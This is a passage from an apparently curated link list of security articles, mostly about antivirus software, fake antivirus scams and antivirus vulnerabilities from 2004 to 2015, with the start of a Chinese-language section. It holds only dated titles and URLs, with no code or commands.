Minimum VT Score](https://www.metaflows.com/blog/network-antivirus-white-list-and-minimum-vt-score/) - 2015.01 [welivesecurity] [Do you really need antivirus software for Linux desktops?](https://www.welivesecurity.com/2015/01/13/really-need-antivirus-software-linux-desktops/) - 2014.12 [govolution] [Deepsec 2014: Why Antivirus Software fails](https://govolution.wordpress.com/2014/12/13/deepsec-2014-why-antvirus-software-fails/) - 2014.11 [gironsec] [assembly, c-sharp, anti-sandbox, anti-antivirus, anti-debug, and malware research](https://www.gironsec.com/blog/2014/11/too-much-stuff/) - 2014.11 [trustlook] [Trustlook Antivirus & Security is back on Google Play Store!](https://blog.trustlook.com/2014/11/12/trustlook-antivirus-security-back-google-play-store/) - 2014.10 [pediy] [[翻译]卡巴斯基研究员Santiago Pontiroli在Virus Bulletin会议上发表《比特币犯罪快速升级》](https://bbs.pediy.com/thread-193555.htm) - 2014.10 [rapid7] [Noise Canceling Security: Extract More Value From IPS/IDS, Firewalls, and Anti-Virus](https://blog.rapid7.com/2014/10/22/reducing-alert-fatigue-userinsight-helps-extract-more-value-from-your-security-investments/) - 2014.10 [securityintelligence] [Are You Digging Deep? When Antivirus Is Not Enough](https://securityintelligence.com/are-you-digging-deep-when-antivirus-is-not-enough/) - 2014.09 [deepsec] [DeepSec 2014 Talk: Why Anti-Virus Software fails](http://blog.deepsec.net/deepsec-2014-talk-why-anti-virus-software-fails/) - 2014.08 [zonealarm] [Is Your PC Security Incomplete? Why You Need Both Firewall & Antivirus](https://www.zonealarm.com/blog/2014/08/is-your-pc-security-incomplete-why-you-need-both-firewall-antivirus/) - 2014.08 [zonealarm] [Is Your PC Security Incomplete? Why You Need Both Firewall & Antivirus](https://blog.zonealarm.com/2014/08/is-your-pc-security-incomplete-why-you-need-both-firewall-antivirus/) - 2014.08 [trendmicro] [Maximum Protection, Minimum Fuss: Trend Micro Titanium Antivirus+](http://blog.trendmicro.com/maximum-protection-security/) - 2014.08 [arneswinnen] [One Packer to Rule Them All: Empirical Identification, Comparison and Circumvention of Current Antivirus Detection Techniques](https://www.arneswinnen.net/2014/08/one-packer-to-rule-them-all-empirical-identification-comparison-and-circumvention-of-current-antivirus-detection-techniques/) - 2014.07 [comodo] [Vulnerabilities in Antivirus ID’d – Comodo Has the Solution](https://blog.comodo.com/it-security/researcher-ids-vulnerabilities-antivirus-software-comodo-solution/) - 2014.07 [comodo] [Vulnerabilities in Antivirus ID’d – Comodo Has the Solution](https://blog.comodo.com/researcher-ids-vulnerabilities-antivirus-software-comodo-solution/) - 2014.06 [trendmicro] [The evolving role of antivirus software](http://blog.trendmicro.com/evolving-role-antivirus-software/) - 2014.06 [portcullis] [Could Sophos Anti-Virus Web Protection cause a privacy concern for your organisation?](https://labs.portcullis.co.uk/blog/could-sophos-antivirus-web-protection-cause-a-privacy-concern-for-your-organisation/) - 2014.05 [lastline] [Antivirus Isn’t Dead, It Just Can’t Keep Up](https://www.lastline.com/labsblog/antivirus-isnt-dead-it-just-cant-keep-up/) - 2014.05 [alienvault] [Antivirus is Dead, hmmm?  – Surprised, We are Not](https://www.alienvault.com/blogs/industry-insights/antivirus-is-dead-hmmm-surprised-we-are-not) - 2014.05 [securelist] [Fake antivirus – attack of the clones](https://securelist.com/fake-antivirus-attack-of-the-clones/63770/) - 2014.05 [sophos] [Sophos news in review: Partner conferences kick off, Target CEO resigns, and is antivirus ‘dead’?](https://news.sophos.com/en-us/2014/05/10/sophos-news-in-review-partner-conferences-kick-off-target-ceo-resigns-and-is-antivirus-dead/) - 2014.05 [krebsonsecurity] [Antivirus is Dead: Long Live Antivirus!](https://krebsonsecurity.com/2014/05/antivirus-is-dead-long-live-antivirus/) - 2014.04 [ethicalhackingnews] [Google Refund for Fake Android Antivirus](https://ethicalhackingnews.blogspot.com/2014/04/google-refund-for-fake-android-antivirus.html) - 2014.04 [aircrack] [Anti-virus issues and open letter to Anti-virus](https://aircrack-ng.blogspot.com/2014/06/anti-virus-issues-and-open-letter-to.html) - 2014.04 [ethicalhackingnews] [Anti-virus App Virus Shield](https://ethicalhackingnews.blogspot.com/2014/04/anti-virus-app-virus-shield.html) - 2014.04 [sophos] [Sophos Antivirus for vShield and OpenSSL Vulnerability (Heartbleed)](https://news.sophos.com/en-us/2014/04/10/sophos-antivirus-for-vshield-and-openssl-vulnerability-heartbleed/) - 2014.01 [malwarebytes] [Malwarebytes Anti-Malware tops in OPSWAT Antivirus Market Share Report](https://blog.malwarebytes.com/malwarebytes-news/2014/01/malwarebytes-anti-malware-tops-in-opswat-antivirus-market-share-report/) - 2014.01 [robert] [Bootable antivirus rescue CDs](https://robert.penz.name/734/bootable-antivirus-rescue-cds/) - 2014.01 [ethicalhackingnews] [Why Using Multiple Antivirus Programs is a Bad Idea](https://ethicalhackingnews.blogspot.com/2014/01/why-using-multiple-antivirus-programs.html) - 2014.01 [rapid7] [12 Days of HaXmas: A Cat and Mouse Game Between Exploits and Antivirus](https://blog.rapid7.com/2014/01/05/a-cat-and-mouse-game-between-exploits-and-antivirus/) - 2013.12 [welivesecurity] [The Death of Anti-Virus: conference paper](https://www.welivesecurity.com/2013/12/19/the-death-of-anti-virus-conference-paper/) - 2013.12 [cert] [OTP stealer Android app masquerading as mobile antivirus targets Polish users](https://www.cert.pl/en/news/single/otp-stealer-android-app-masquerading-as-mobile-antivirus-targets-polish-users/) - 2013.12 [privacy] [Stop Fighting Anti-Virus 4: The Cert Signing Trick](http://privacy-pc.com/articles/stop-fighting-anti-virus-4-the-cert-signing-trick.html) - 2013.12 [privacy] [Stop Fighting Anti-Virus 3: Impetus through Embarrassment](http://privacy-pc.com/articles/stop-fighting-anti-virus-3-impetus-through-embarrassment.html) - 2013.12 [privacy] [Stop Fighting Anti-Virus 2: Pursuit of Better Protection](http://privacy-pc.com/articles/stop-fighting-anti-virus-2-pursuit-of-better-protection.html) - 2013.12 [privacy] [Stop Fighting Anti-Virus: Pentester’s Viewpoint](http://privacy-pc.com/articles/stop-fighting-anti-virus-pentesters-viewpoint.html) - 2013.12 [securelist] [ZeuS – Now Packed as an Antivirus Update](https://securelist.com/zeus-now-packed-as-an-antivirus-update/58173/) - 2013.12 [malwarebytes] [“Buy $500 antivirus from us,” say cyber-criminals](https://blog.malwarebytes.com/threat-analysis/2013/12/buy-500-antivirus-from-us-say-cyber-criminals/) - 2013.11 [techhelplist] [Multiple Antivirus Vendors - ... Important System Update - requires immediate action - Virus](https://techhelplist.com/spam-list/403-avast-antivirus-important-system-update-requires-immediate-action-virus) - 2013.11 [malwarebytes] [Scammers Pose as Anti-Virus, Go Figure](https://blog.malwarebytes.com/cybercrime/2013/11/scammers-pose-as-anti-virus-go-figure/) - 2013.10 [trendmicro] [Is Free Antivirus Software Enough?](https://blog.trendmicro.com/trendlabs-security-intelligence/is-free-antivirus-software-enough/) - 2013.10 [welivesecurity] [Solutions to current antivirus challenges](https://www.welivesecurity.com/2013/10/19/solutions-to-current-antivirus-challenges/) - 2013.10 [malwarebytes] [Palestinian hackers deface popular Antivirus’ websites](https://blog.malwarebytes.com/cybercrime/2013/10/palestinian-hackers-deface-antivirus-websites/) - 2013.09 [osandamalith] [Free Antivirus by Panda Security](https://osandamalith.com/2013/09/16/free-antivirus-by-panda-security/) - 2013.08 [sans] [What Anti-virus Program Is Right For You?](https://isc.sans.edu/forums/diary/What+Antivirus+Program+Is+Right+For+You/16288/) - 2013.07 [malwarejake] [Beating up on poor antivirus...](http://malwarejake.blogspot.com/2013/07/interesting-malware-defense.html) - 2013.07 [arxiv] [[1307.6354] Protecting Anti-virus Programs From Viral Attacks](https://arxiv.org/abs/1307.6354) - 2013.07 [arxiv] [[1307.5420] How do Viruses Attack Anti-Virus Programs](https://arxiv.org/abs/1307.5420) - 2013.07 [krebsonsecurity] [Styx Crypt Makers Push DDoS, Anti-Antivirus Services](https://krebsonsecurity.com/2013/07/styx-crypt-makers-push-ddos-anti-antivirus-services/) - 2013.05 [virusbulletin] [US lifts ban on anti-virus software for Iran](https://www.virusbulletin.com/blog/2013/05/us-lifts-ban-anti-virus-software-iran/) - 2013.04 [sans] [What is "up to date anti-virus software"?](https://isc.sans.edu/forums/diary/What+is+up+to+date+antivirus+software/15692/) - 2013.02 [sans] [Anti-virus is not enough to defeat APT groups](https://digital-forensics.sans.org/blog/2013/02/08/anti-virus-is-not-enough-to-defeat-apt-groups) - 2013.02 [securityblog] [Get antivirus name on Windows using C#](http://securityblog.gr/1470/get-antivirus-name-on-windows-using-c/) - 2013.01 [mcafee] [If You Deploy Only Antivirus, It Will Cost You More and Make You Less Secure](https://securingtomorrow.mcafee.com/mcafee-labs/if-you-only-deploy-antivirus-it-will-cost-you-more-and-make-you-less-secure/) - 2012.12 [privacy] [VX – The Virus Underground 5: Discussing Interaction with Antivirus Companies](http://privacy-pc.com/articles/vx-the-virus-underground-5-discussing-interaction-with-antivirus-companies.html) - 2012.12 [privacy] [G Data AntiVirus review](http://privacy-pc.com/antivirus-software-review/g-data-antivirus-review.html) - 2012.12 [rapid7] [The Odd Couple: Metasploit and Antivirus Solutions](https://blog.rapid7.com/2012/12/14/the-odd-couple-metasploit-and-antivirus-solutions/) - 2012.12 [securiteam] [Anti-Virus, now with added Michelangelo](https://blogs.securiteam.com/index.php/archives/1995) - 2012.12 [welivesecurity] [Why Anti-Virus is not a waste of money](https://www.welivesecurity.com/2012/12/04/why-anti-virus-is-not-a-waste-of-money/) - 2012.11 [krebsonsecurity] [Infamous Hacker Heading Chinese Antivirus Firm?](https://krebsonsecurity.com/2012/11/infamous-hacker-heading-chinese-antivirus-firm/) - 2012.11 [cyberarms] [McAfee Anti-Virus Founder – Bath Salts, Gangsters and Murder?](https://cyberarms.wordpress.com/2012/11/12/mcafee-anti-virus-founder-bath-salts-gangters-and-murder/) - 2012.11 [sans] [The shortcomings of anti-virus software](https://isc.sans.edu/forums/diary/The+shortcomings+of+antivirus+software/14437/) - 2012.10 [virusbulletin] [Anti-virus software significantly shortens life of banking trojans](https://www.virusbulletin.com/blog/2012/10/anti-virus-software-significantly-shortens-life-banking-trojans/) - 2012.10 [cyberarms] [GFI Cloud Management for Antivirus, Asset Tracking & Network Management](https://cyberarms.wordpress.com/2012/10/04/gfi-cloud-management-for-antivirus-asset-tracking-network-management/) - 2012.09 [privacy] [VIPRE Antivirus 2014 review](http://privacy-pc.com/antivirus-software-review/vipre-antivirus-review.html) - 2012.08 [forcepoint] [Malicious Email Messages Posing as Antivirus Notifications](https://www.forcepoint.com/blog/security-labs/malicious-email-messages-posing-antivirus-notifications) - 2012.08 [rsa] [The failure of Antivirus against recent Malware](https://community.rsa.com/community/products/netwitness/blog/2012/08/23/the-failure-of-antivirus-against-recent-malware) - 2012.08 [sans] [Do we need test procedures in our companies before implementing Antivirus signatures?](https://isc.sans.edu/forums/diary/Do+we+need+test+procedures+in+our+companies+before+implementing+Antivirus+signatures/13933/) - 2012.07 [privacy] [Panda Antivirus Pro 2014 review](http://privacy-pc.com/antivirus-software-review/panda-antivirus-pro-review.html) - 2012.06 [perezbox] [Review of the WordPress AntiVirus Plugin – Effective or Not?](https://perezbox.com/2012/06/review-wordpress-antivirus-plugin-effective-not/) - 2012.06 [freebuf] [unix反病毒工具包 – Clam AntiVirus Toolkit 0.97.5](http://www.freebuf.com/sectool/4226.html) - 2012.06 [perezbox] [Selecting a MAC Anti-Virus Solution](https://perezbox.com/2012/06/selecting-a-mac-anti-virus-solution/) - 2012.06 [codeinsecurity] [The anti-virus age is over.](https://codeinsecurity.wordpress.com/2012/06/13/the-anti-virus-age-is-over/) - 2012.05 [checkpoint] [Check Point Launches ZoneAlarm® Free Antivirus + Firewall 2013](https://www.checkpoint.com/press/2012/check-point-launches-zonealarm-free-antivirus-firewall-2013/) - 2012.04 [privacy] [How malware authors are winning the war 2: exploit toolkits, fake antiviruses and mobile threats](http://privacy-pc.com/articles/how-malware-authors-are-winning-the-war-2-exploit-toolkits-fake-antiviruses-and-mobile-threats.html) - 2012.04 [privacy] [Bitdefender Antivirus Plus 2017 review](http://privacy-pc.com/antivirus-software-review/bitdefender-antivirus-plus-review.html) - 2012.04 [sans] [Anti-virus scanning exclusions](https://isc.sans.edu/forums/diary/Antivirus+scanning+exclusions/12988/) - 2012.04 [sans] [Is Anti-Virus Really Dead? A Real-World Simulation Created for Forensic Data Yields Surprising Results](https://digital-forensics.sans.org/blog/2012/04/09/is-anti-virus-really-dead-a-real-world-simulation-created-for-forensic-data-yields-surprising-results) - 2012.04 [sans] [Digital Forensics Case Leads: Macs do need antivirus after all and Pastebin may start cutting what hackers paste](https://digital-forensics.sans.org/blog/2012/04/06/digital-forensics-case-leads-macs-do-need-antivirus-after-all-and-pastebin-may-start-cutting-what-hackers-paste) - 2012.04 [pentestlab] [Post Exploitation – Disable Firewall and Kill Antivirus](https://pentestlab.blog/2012/04/06/post-exploitation-disable-firewall-and-kill-antivirus/) - 2012.04 [welivesecurity] [Free Anti-virus: Worth Every Penny?](https://www.welivesecurity.com/2012/04/05/free-anti-virus-worth-every-penny/) - 2012.03 [welivesecurity] [Information Security Disconnect: RSA, USB, Antivirus, and reality](https://www.welivesecurity.com/2012/03/05/information-security-disconnect-rsa-usb-av-and-reality/) - 2012.03 [welivesecurity] [Security Professionals DO use antivirus](https://www.welivesecurity.com/2012/03/05/security-professionals-do-use-anti-virus/) - 2012.03 [hackingarticles] [Antivirus Forensics Tools](http://www.hackingarticles.in/antivirus-forensics-tools/) - 2012.02 [privacy] [F-Secure Anti-Virus review](http://privacy-pc.com/antivirus-software-review/f-secure-anti-virus-review.html) - 2012.02 [privacy] [PC Tools Spyware Doctor with AntiVirus review](http://privacy-pc.com/antivirus-software-review/pc-tools-spyware-doctor-with-antivirus-review.html) - 2012.02 [privacy] [Free Antivirus vs Paid Antivirus: Interview with Michael Gregg](http://privacy-pc.com/news/free-antivirus-vs-paid-antivirus-interview-with-michael-gregg.html) - 2012.02 [sans] [Problem with Microsoft Antivirus regarding malware from google website](https://isc.sans.edu/forums/diary/Problem+with+Microsoft+Antivirus+regarding+malware+from+google+website/12589/) - 2012.02 [privacy] [Kaspersky Anti-Virus 2015 review](http://privacy-pc.com/antivirus-software-review/kaspersky-anti-virus-review.html) - 2012.01 [krebsonsecurity] [Microsoft: Worm Operator Worked at Antivirus Firm](https://krebsonsecurity.com/2012/01/microsoft-worm-author-worked-at-antivirus-firm/) - 2011.11 [virusbulletin] [Most free Android anti-virus 'useless', find testers](https://www.virusbulletin.com/blog/2011/11/most-free-android-anti-virus-useless-find-testers/) - 2011.11 [securelist] [Fake Kaspersky Antivirus](https://securelist.com/fake-kaspersky-antivirus/29439/) - 2011.10 [deepsec] [Talk: FakeAntiVirus – Journey from Trojan to a Persisent Threat](http://blog.deepsec.net/talk-fakeantivirus-journey-from-trojan-to-a-persisent-threat/) - 2011.10 [hboeck] [Anti-virus applications and the Bundestrojaner](https://blog.hboeck.de/archives/795-Anti-virus-applications-and-the-Bundestrojaner.html) - 2011.09 [welivesecurity] [RIP Anti-Virus (Again)](https://www.welivesecurity.com/2011/09/09/rip-anti-virus-again/) - 2011.08 [trendmicro] [Ask Vic — In order to install Titanium Maximum, do I need to uninstall my current antivirus software?](http://blog.trendmicro.com/ask-vic-in-order-to-install-titanium-maximum-do-i-need-to-uninstall-my-current-antivirus-software/) - 2011.08 [virusbulletin] [Fake codec trojan disables anti-virus software](https://www.virusbulletin.com/blog/2011/08/fake-codec-trojan-disables-anti-virus-software/) - 2011.08 [krebsonsecurity] [Fake Antivirus Industry Down, But Not Out](https://krebsonsecurity.com/2011/08/fake-antivirus-industry-down-but-not-out/) - 2011.08 [welivesecurity] [Win32/Delf.QCZ:Trust Me, I’m Your Anti-Virus](https://www.welivesecurity.com/2011/08/03/win32delf-qcztrust-me-im-your-anti-virus/) - 2011.06 [talosintelligence] [A Close Look at Rogue Antivirus Programs](https://blog.talosintelligence.com/2011/06/close-look-at-rogue-antivirus-programs.html) - 2011.06 [sans] [Harry Potter and the Rogue anti-virus: Part 1](https://isc.sans.edu/forums/diary/Harry+Potter+and+the+Rogue+antivirus+Part+1/11041/) - 2011.06 [trendmicro] [How to Secure Your Mac Against Fake Antivirus Malware](http://blog.trendmicro.com/how-to-secure-your-mac-against-fake-antivirus-malware/) - 2011.06 [sans] [Some Insight into Apple's Anti-Virus Signatures](https://isc.sans.edu/forums/diary/Some+Insight+into+Apples+AntiVirus+Signatures/10981/) - 2011.05 [sans] [More on MAC OSX Malware - MACDefender Fake Antivirus](https://isc.sans.edu/forums/diary/More+on+MAC+OSX+Malware+MACDefender+Fake+Antivirus/10813/) - 2011.04 [arxiv] [[1104.1070] Evolution of Computer Virus Concealment and Anti-Virus Techniques: A Short Survey](https://arxiv.org/abs/1104.1070) - 2011.03 [krebsonsecurity] [Rogue Antivirus Via Skype Phone Call?](https://krebsonsecurity.com/2011/03/rogue-antivirus-via-skype-phone-call/) - 2011.03 [krebsonsecurity] [Renewal Buddy: Comparison Shopping for Anti-Virus Software](https://krebsonsecurity.com/2011/03/renewal-buddy-comparison-shopping-for-anti-virus-software/) - 2011.02 [trendmicro] [Firewalls, Antivirus, Antispam, Oh My!](http://blog.trendmicro.com/firewalls-antivirus-antispam-oh-my/) - 2011.02 [deepsec] [The Antivirus-Virus Conundrum](http://blog.deepsec.net/the-antivirus-virus-conundrum/) - 2011.01 [sans] [Yet another rogue anti-virus](https://isc.sans.edu/forums/diary/Yet+another+rogue+antivirus/10288/) - 2011.01 [rapid7] [Become invisible to anti-virus protection](https://blog.rapid7.com/2011/01/06/become-invisible-to-anti-virus-protection/) - 2010.12 [toolswatch] [Q4 2010 Antivirus, Backup Client and Windows OS Reports](http://www.toolswatch.org/2010/12/q4-2010-antivirus-backup-client-and-windows-os-reports/) - 2010.09 [securelist] [The antivirus weather forecast: cloudy](https://securelist.com/the-antivirus-weather-forecast-cloudy/36321/) - 2010.09 [securelist] [Understanding Current Trends in the Fake Anti-Virus/Scareware Ecosystem](https://securelist.com/understanding-current-trends-in-the-fake-anti-virusscareware-ecosystem/29741/) - 2010.08 [krebsonsecurity] [Anti-virus Products Struggle Against Exploits](https://krebsonsecurity.com/2010/08/anti-virus-products-struggle-against-exploits/) - 2010.08 [virusbulletin] [A third of anti-malware products fail to secure Vista Business Edition, Virus Bulletin reveals](https://www.virusbulletin.com/blog/2010/08/third-anti-malware-products-fail-secure-vista-business-edition-reveals/) - 2010.08 [krebsonsecurity] [Anti-virus Products Mostly Ignore Windows Security Features](https://krebsonsecurity.com/2010/08/anti-virus-products-mostly-ignore-windows-security-features/) - 2010.07 [krebsonsecurity] [Rogue Antivirus Victims Seldom Fight Back](https://krebsonsecurity.com/2010/07/rogue-antivirus-victims-seldom-fight-back/) - 2010.07 [securelist] [Anti-virus testing – to believe or not to believe](https://securelist.com/anti-virus-testing-to-believe-or-not-to-believe/29620/) - 2010.06 [krebsonsecurity] [Anti-virus is a Poor Substitute for Common Sense](https://krebsonsecurity.com/2010/06/anti-virus-is-a-poor-substitute-for-common-sense/) - 2010.05 [welivesecurity] [Test Toot Suite: Antivirus Vendors Blowing Own Horn](https://www.welivesecurity.com/2010/05/27/test-toot-suite-antivirus-vendors-blowing-own-horn/) - 2010.05 [greyhathacker] [Fake Antivirus “Security Tool” terminating new processes](http://www.greyhathacker.net/?p=191) - 2010.04 [krebsonsecurity] [Rogue Antivirus Gangs Seize on McAfee Snafu](https://krebsonsecurity.com/2010/04/rogue-antivirus-gangs-seize-on-mcafee-snafu/) - 2010.04 [securelist] [Rogue Anti Virus: Scaring people with Task Manager](https://securelist.com/rogue-anti-virus-scaring-people-with-task-manager/29591/) - 2010.04 [welivesecurity] [Guest Blog: How free is free Antivirus?](https://www.welivesecurity.com/2010/04/14/guest-blog-how-free-is-free-antivirus/) - 2010.04 [trendmicro] [Rogue Antivirus Leads to an Adult Site](https://blog.trendmicro.com/trendlabs-security-intelligence/rogue-antivirus-leads-to-an-adult-site/) - 2010.03 [welivesecurity] [Virus, Anti-Virus, Fake Anti-Virus](https://www.welivesecurity.com/2010/03/26/virus-anti-virus-fake-anti-virus/) - 2010.03 [krebsonsecurity] [Bad BitDefender Antivirus Update Hobbles Windows PCs](https://krebsonsecurity.com/2010/03/bad-bitdefender-antivirus-update-hobbles-windows-pcs/) - 2010.03 [techorganic] [Fight scareware: Learn how your anti-virus works](https://blog.techorganic.com/2010/03/12/fight-scareware-learn-how-your-anti/) - 2010.03 [greyhathacker] [Fake Antivirus “XP Guardian 2010” exe hijacking](http://www.greyhathacker.net/?p=142) - 2010.03 [trendmicro] [Spammers Target Antivirus Companies](https://blog.trendmicro.com/trendlabs-security-intelligence/spammers-target-antivirus-companies/) - 2010.02 [welivesecurity] [NOD32 Antivirus for Mac: Some Questions](https://www.welivesecurity.com/2010/02/07/nod32-antivirus-for-mac-some-questions/) - 2009.11 [securelist] [Rogue antivirus: a growing problem](https://securelist.com/rogue-antivirus-a-growing-problem/36274/) - 2009.11 [talosintelligence] [Paranoia and the rise of fake antivirus](https://blog.talosintelligence.com/2009/11/paranoia-and-rise-of-fake-antivirus.html) - 2009.10 [securelist] [The evolution of rogue antivirus](https://securelist.com/the-evolution-of-rogue-antivirus/30576/) - 2009.10 [welivesecurity] [Antivirus? Who Needs It?](https://www.welivesecurity.com/2009/10/16/antivirus-who-needs-it/) - 2009.10 [virusbulletin] [11 out of 26 anti-virus products fail VB100 certification](https://www.virusbulletin.com/blog/2009/10/11-out-26-anti-virus-products-fail-certification/) - 2009.09 [sans] [Fake anti-virus](https://isc.sans.edu/forums/diary/Fake+antivirus/7066/) - 2009.07 [trendmicro] [Rogue Antivirus Terminates EXE Files](https://blog.trendmicro.com/trendlabs-security-intelligence/rogue-antivirus-terminates-exe-files/) - 2009.06 [trendmicro] [Air France Flight 447 Search Results Lead to Rogue Antivirus](https://blog.trendmicro.com/trendlabs-security-intelligence/search-results-for-air-france-flight-447-lead-to-rogue-antivirus/) - 2009.06 [pediy] [[Anti Virus专题]1.7 - 打造DLL内存加载引擎.](https://bbs.pediy.com/thread-90441.htm) - 2009.05 [trendmicro] [Fake Antivirus Targets Brazil](https://blog.trendmicro.com/trendlabs-security-intelligence/fake-antivirus-targets-brazil/) - 2009.05 [sans] [Is your Symantec Antivirus Alerting working correctly?](https://isc.sans.edu/forums/diary/Is+your+Symantec+Antivirus+Alerting+working+correctly/6370/) - 2009.05 [pediy] [[Anti Virus专题]长度反汇编引擎的打造](https://bbs.pediy.com/thread-87915.htm) - 2009.04 [pediy] [[Anti Virus专题]1.2 - 4.PE结构、SEH相关知识掌握](https://bbs.pediy.com/thread-86452.htm) - 2009.04 [pediy] [[Anti Virus专题]1.2 - 3.hash扫描获得api函数地址](https://bbs.pediy.com/thread-86216.htm) - 2009.04 [pediy] [[Anti Virus专题]1.2 - 2.kernel32基地址获得](https://bbs.pediy.com/thread-85910.htm) - 2009.04 [pediy] [[Anti Virus专题]1.2 - 1.病毒的重定位技术](https://bbs.pediy.com/thread-85851.htm) - 2009.01 [virusbulletin] [Virus Bulletin announces new anti-spam certification scheme](https://www.virusbulletin.com/blog/2009/01/announces-new-anti-spam-certification-scheme/) - 2008.12 [trendmicro] [Yet More Fake (And Malicious) Antivirus](https://blog.trendmicro.com/trendlabs-security-intelligence/yet-more-fake-and-malicious-antivirus/) - 2008.09 [sans] [Fake antivirus 2009 and search engine results](https://isc.sans.edu/forums/diary/Fake+antivirus+2009+and+search+engine+results/5042/) - 2008.08 [trendmicro] [Fake Antivirus Trojans Ramping Up](https://blog.trendmicro.com/trendlabs-security-intelligence/fake-antivirus-trojans-ramping-up/) - 2008.08 [securelist] [Antivirus Fraudware Goes Mobile?](https://securelist.com/antivirus-fraudware-goes-mobile/30444/) - 2008.07 [sans] [Is Anti-Virus Dead?](https://isc.sans.edu/forums/diary/Is+AntiVirus+Dead/4808/) - 2008.04 [securelist] [Changing threats, changing solutions: A history of viruses and antivirus](https://securelist.com/changing-threats-changing-solutions-a-history-of-viruses-and-antivirus/36202/) - 2008.02 [sans] [Does your anti-virus detect old keyloggers?](https://isc.sans.edu/forums/diary/Does+your+antivirus+detect+old+keyloggers/3938/) - 2007.12 [sans] [Anti-virus Control means blocking before scanning](https://isc.sans.edu/forums/diary/Antivirus+Control+means+blocking+before+scanning/3711/) - 2007.10 [sans] [Cyber Security Awareness Tip #8: Anti-Virus, Anti-Spyware, and Other Protective Software](https://isc.sans.edu/forums/diary/Cyber+Security+Awareness+Tip+8+AntiVirus+AntiSpyware+and+Other+Protective+Software/3468/) - 2007.09 [sans] [AOL changes the free anti-virus they distribute](https://isc.sans.edu/forums/diary/AOL+changes+the+free+antivirus+they+distribute/3360/) - 2007.07 [sans] [Antivirus: The emperor is naked](https://isc.sans.edu/forums/diary/Antivirus+The+emperor+is+naked/3179/) - 2007.06 [pelock] [Kaspersky Anti-Virus v6.0.2 vs OllyDbg](https://www.pelock.com/blog/2007/06/13/kaspersky-anti-virus-v602-vs-ollydbg/) - 2007.03 [sans] [Comparing Anti-Virus Solutions](https://isc.sans.edu/forums/diary/Comparing+AntiVirus+Solutions/2366/) - 2007.02 [sans] [TrendMicro Anti-Virus vulnerability](https://isc.sans.edu/forums/diary/TrendMicro+AntiVirus+vulnerability/2190/) - 2006.12 [securelist] [Are all antivirus created equal?](https://securelist.com/are-all-antivirus-created-equal/30271/) - 2006.11 [securelist] [Antivirus and Vista](https://securelist.com/antivirus-and-vista/30260/) - 2006.10 [trendmicro] [Free Antivirus Installation… By A Trojan](https://blog.trendmicro.com/trendlabs-security-intelligence/free-antivirus-installation-by-a-trojan/) - 2006.09 [sans] [CA eTrust Antivirus [was] flagging lsass.e x e](https://isc.sans.edu/forums/diary/CA+eTrust+Antivirus+was+flagging+lsasse+x+e/1665/) - 2006.06 [securelist] [And some thoughts on the anti-virus industry](https://securelist.com/and-some-thoughts-on-the-anti-virus-industry/30185/) - 2006.05 [sans] [Critical vulnerability in Sophos Anti-Virus products](https://isc.sans.edu/forums/diary/Critical+vulnerability+in+Sophos+AntiVirus+products/1325/) - 2006.01 [trendmicro] [Anti-Virus or Pro-Virus?](https://blog.trendmicro.com/trendlabs-security-intelligence/anti-virus-or-pro-virus3f/) - 2006.01 [securelist] [No rootkit in Kaspersky Anti-Virus](https://securelist.com/no-rootkit-in-kaspersky-anti-virus/30116/) - 2006.01 [sans] [2nd generation WMF exploit: status of the anti-virus products after one day.](https://isc.sans.edu/forums/diary/2nd+generation+WMF+exploit+status+of+the+antivirus+products+after+one+day/998/) - 2005.11 [securelist] [The contemporary antivirus industry and its problems](https://securelist.com/the-contemporary-antivirus-industry-and-its-problems/36063/) - 2005.10 [sans] [Symantec Antivirus Scan Engine: Web Service Administrative Interface Buffer Overflow](https://isc.sans.edu/forums/diary/Symantec+Antivirus+Scan+Engine+Web+Service+Administrative+Interface+Buffer+Overflow/723/) - 2005.10 [sans] [Kaspersky Anti-Virus Products Remote Heap Overflow Vulnerability](https://isc.sans.edu/forums/diary/Kaspersky+AntiVirus+Products+Remote+Heap+Overflow+Vulnerability/719/) - 2005.08 [infosecblog] [Symantec Antivirus 9 Privilege Escalation](https://www.infosecblog.org/2005/08/symantec-antivirus-9-privilege-escalation/) - 2005.05 [sans] [Google Web Accelerator continued; phpBB 2.0.15 released; Backdoors more popular than Viruses?; Anti-Spyware poll results; Google.com DNS glitch; SQL server 2000 SP4](https://isc.sans.edu/forums/diary/Google+Web+Accelerator+continued+phpBB+2015+released+Backdoors+more+popular+than+Viruses+AntiSpyware+poll+results+Googlecom+DNS+glitch+SQL+server+2000+SP4/531/) - 2005.04 [securelist] [Kaspersky Anti-Virus Web Scanner](https://securelist.com/kaspersky-anti-virus-web-scanner/29989/) - 2005.02 [securelist] [Spammers hide from antivirus vendors](https://securelist.com/spammers-hide-from-antivirus-vendors/29965/) - 2004.11 [sans] [An anti-virus goof; security awareness; and a return visit from some old friends; phishers, and sasser](https://isc.sans.edu/forums/diary/An+antivirus+goof+security+awareness+and+a+return+visit+from+some+old+friends+phishers+and+sasser/367/) - 2004.11 [sans] [MS Security Alert Advanced Notice, Cisco PIX Source Code Reported Stolen, Open Letter to Anti-Virus Software Companies](https://isc.sans.edu/forums/diary/MS+Security+Alert+Advanced+Notice+Cisco+PIX+Source+Code+Reported+Stolen+Open+Letter+to+AntiVirus+Software+Companies/356/) - 2004.10 [securelist] [The changing antivirus landscape](https://securelist.com/the-changing-antivirus-landscape/29855/) - 2004.10 [securelist] [Antivirus updating – why it’s more important than ever before](https://securelist.com/antivirus-updating-why-its-more-important-than-ever-before/36029/) - 2004.10 [securelist] [Traditional antivirus solutions – are they effective against today’s threats?](https://securelist.com/traditional-antivirus-solutions-are-they-effective-against-todays-threats/36028/) - 2004.02 [sans] [Flaws in Checkpoint and RealOne; MyDoom Update; AntiVirus Software; Data Call](https://isc.sans.edu/forums/diary/Flaws+in+Checkpoint+and+RealOne+MyDoom+Update+AntiVirus+Software+Data+Call/105/) - 2004.01 [sans] [Microsoft patches released; H.323 vulnerabilities; Anti-virus engine vulnerabilities; Citibank anti-fraud measures](https://isc.sans.edu/forums/diary/Microsoft+patches+released+H323+vulnerabilities+Antivirus+engine+vulnerabilities+Citibank+antifraud+measures/85/) *** ## <a id="4e403284d24b06f1830ddbe67a132408"></a>杀软/杀毒/杀 - 2020.03 [freebuf] [RobbinHood勒索软件另辟渠道,通过驱动漏洞干翻杀毒软件](https://www.freebuf.com/articles/system/228338.html) - 2020.03 [freebuf] [BUF大事件丨天猫超市大数据“杀熟”?官方网友在线Battle;新版个人信息安全规范正式发布,隐私安全得到高度重视](https://www.freebuf.com/news/230248.html) - 2020.03 [aliyun] [linux下java反序列化通杀回显方法的低配版实现](https://xz.aliyun.com/t/7307) - 2020.02 